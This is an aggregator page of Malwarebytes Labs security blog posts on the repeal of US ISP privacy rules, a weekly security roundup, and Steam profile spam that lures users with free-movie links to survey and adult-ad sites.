In late March, Congress approved a bill lifting restrictions imposed on ISPs last year concerning what they could do with information such as customer browsing habits, app usage history, location data, and Social Security numbers. They additionally absolved ISPs of the need to strengthen their existing customer data holdings against hackers and thieves. For more on the particulars of the bill, you can see reports on the Washington Post and Ars Technica. Given that the repealed restrictions hadn’t yet come into effect, the immediate impact of the new bill is somewhat unclear. But given what typically happens with massive stores of aggregated, location-specific customer data, the prognosis is not good.

So what’s the worst that can happen? Let’s run through a few probable outcomes:

Ad retargeting

We all might be familiar with this; when we buy a product online and then see ads for it relentlessly for a couple weeks thereafter. But with increased granularity of metadata, ad retargeting can be significantly more ‘effective.’ As an example, certain tech support scam companies prefer to draw their staff directly from complicit drug detoxes and rehabs, largely in order to ensure a compliant, desperate employee base. So the next time someone searches for help with an intractable heroin addiction, they might get targeted ads for unlicensed rehabs that come with a new job opportunity of scamming the elderly. Perhaps if my browser history correlates to those of low income or unemployed people, my ads would fill with work from home scams. Or low literacy search phrasing, in conjunction with low income, could get me directed to multi-level marketing scams. There are a cornucopia of ways to target the weak and vulnerable via metadata and it’s both legal and profitable.

 

Stalking

As we can see with many domestic violence cases, abusers have no compunction against using technology to stalk and harass their victims. A 2014 article by NPR surveyed a series of domestic violence shelters and found 75% of their clients had dealt with abusers monitoring them remotely using hidden mobile apps. Some ill-conceived apps have linked multiple sets of user data together, to create inadvertent ‘stalking apps’. Once search metadata is openly sold, a person suffering domestic abuse would have a hard time searching for a local shelter without their partner knowing about it. Even with new homes and new identities, a victim would have to live with the fear of their search patterns combined with IP address identifying them, permanently. Stalking via metadata has been seen as an issue before and it will most likely happen again.

 

Browser History Ransom

We’ve seen doxware in the wild before. But when the barrier to entry is lowered to simply having enough money to purchase the incriminating data in question, why wouldn’t more criminals get in on the game? As seen with ransomware and tech support scams, when technical limitations to a crime are removed, people willing to try it multiply exponentially. Ransoming a victim’s browser history would seem to be easy money.

 

Time to Breach

Essentially, once this data begins to be collected, stored, and prepared for sale, there is a stopwatch set for time to breach and dissemination of your data to the highest bidder on the dark web. Think that’s hyperbolic? In 2015 Comcast published the personal data of almost 75,000 California customers due to operator error. In a separate incident in the same year, 200,000 Comcast customers had their data sold on the dark web. In 2014, Comcast hadn’t patched their mail servers adequately and hackers made off with extensive credentials. Not to be outdone, Time Warner had their customers breached in incidents here and here. Cox Communications paid the FCC a $595,000 fine for breach of its customer data. Given the track record of handling customer data thus far, how long until the next breach?

But this is bad and I don’t want this?

Although options are limited and sometimes frustrating, there are some things you can do. To combat ad retargeting, an ad blocker works quite well. It’s awfully tough to be taken in by deceptive or fraudulent, or just too intrusive advertising if you can’t see it. However, many of the most reputable news sites rely on advertising for revenue, so they ask users to disable ad blockers in order to access content. This doesn’t really address the issue of shadowy third parties doing untoward things with your data, which brings us to…

Virtual Private Networks (VPNs)

Here be dragons, though, because many VPN providers are no more trustworthy than the ISPs that we all love so dearly. If you go to a VPN review site you can see the latest VPNs and how they stack up on quality criteria, which generally include, but are not limited to:

  • Do they keep logs of your activity?
  • How much identifiable data do they keep on you?
  • Do they have physical control over their own VPN servers?
  • What countries are their servers located in?

Check out some reviews of popular VPNs based on answers to these questions here. Another question that you should be asking is how much a VPN costs. Free ones generally find some unsavory ways to monetize your traffic, which is what you’re trying to avoid to begin with.

HTTPS Everywhere

This is a browser extension published by the Electronic Freedom Foundation. It forces websites to use a more secure HTTPS connection when the website supports it. Encrypting traffic in this way does not protect the specific websites you visit from your ISP, but it does obfuscate specific content that you’re accessing on that page. And as a browser extension, it’s fairly easy to install, and probably falls under the category of things you should be doing anyway. If you want to find out more about HTTPS Everywhere, check out their FAQ here.

Calling your congressman

Privacy is a developing issue. As technology advances, its ability to infringe on our privacy in irritating and sometimes dangerous ways can increase. Letting your representatives know that this is a concern can help prevent worse legislation in the future. If you’d like to make your opinion on online privacy known, you can find your representatives here and here.

In conclusion, strong online privacy can sometimes be an inconvenience for those of us trying to catch cybercriminals. But its loss hurts all of us. Whether you have ‘something to hide’ or not, your data and your identity belong to you. Why shouldn’t you control how it’s used?

The post Your ISP, browsing history, and what to do about it appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (Mar 27 – Apr 02)

Malwarebytes - Mon, 04/03/2017 - 15:00

Do we have blogs for you! Last week, we cracked open a big book of definitions on what packers, crypters, and protectors are, dug into preinstalled mobile Adware, and warned of World of Warcraft phishing involving “free” pets. Elsewhere, we explained what exploits actually are and why they’re a big deal, explained the workings of Sage ransomware, took a deep dive into a website compromise campaign, the money problems of tech support scammers, and advised you to avoid a night at the movies.

Below are notable news stories and security-related happenings:

Safe surfing, everyone!

The Malwarebytes Labs Team

The post A week in security (Mar 27 – Apr 02) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Steam spammers have a night at the movies

Malwarebytes - Fri, 03/31/2017 - 15:00

Users of gaming platform Steam have the ability to upload images from games, post messages, and more besides, into their social network stream. They also have the option to upload game-related artwork. Spammers occasionally make use of this feature to sling some spam at the gaming masses.

We’ve spotted one such example in the wild, in the form of a profile claiming to be IMDB offering up free movies. Below you can see they’ve uploaded six decidedly non-game related images, all of which claim a movie is but a click away.

There’s also some spam text accompanying the various pictures in an attempt to gain some search engine juice and also to provide a link for would-be movie watchers to click on.

Some of the links are in the flavor text, a few are only viewable if you enlarge the image, and more still are posted as standalone comments underneath the original picture.

As for where they go, it’s worth noting that Steam’s link filter will warn people that they’re about to move away from Steam (generally, this is there to try and help deter phishing but also serves as fair warning for any other scam you can think of).

Should they continue on with their journey, they’ll end up in a variety of locations.

We looked at three links, which were:

movies.putlockervideos(dot)com/movie/127380/finding-dory(dot)html
free-movies-streaming(dot)com/movie/321612/beauty-and-the-beast(dot)html
watchstv(dot)xyz/?do=play&id=65854-3-3-60-Days-In-Watch-Online-Series

Of the three links, all of them initially land on a “Watch this movie” page with what appears to be a movie player embedded and various pieces of movie-related text scattered about the place.

After that, though:

1. One of our links took us to a survey page, which asks the visitor to fill in personal info on offers in return for “something”. It’s fair to say we’d be very cautious about doing this, as more often than not you never receive the desired prize(s) after handing over a bunch of PII.

2. Another link took us to a movie site which says “sign up for free”, but also wants you to pay a monthly billing fee to continue membership (we looked at the Terms & Conditions, but we couldn’t pin down an exact number).

3. Possibly the worst of the bunch, this one suggests Finding Dory is available to watch.

Clicking the box, however, takes visitors to an Ad rotator URL which drops us off at a variety of non-child friendly links. Various adult webcams, surveys, and related sites all lie in wait.

So, you know, whoops.

Accounts such as the one pushing the above links tend to get deleted or cleaned up (if it’s been hijacked) fairly quickly. Don’t make life easier for the spammers – ignore all of their attempts to give you a night at the movies and report them to Steam. With any luck, they’ll be ejected from the cinema before the trailers are over.

 

Christopher Boyd

The post Steam spammers have a night at the movies appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Pages

Subscribe to Furiously Eclectic People aggregator - Techie Feeds